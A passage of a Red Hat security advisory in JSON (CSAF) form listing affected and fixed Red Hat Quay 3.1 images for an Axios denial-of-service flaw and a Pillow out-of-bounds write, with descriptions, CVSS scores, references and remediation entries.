"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
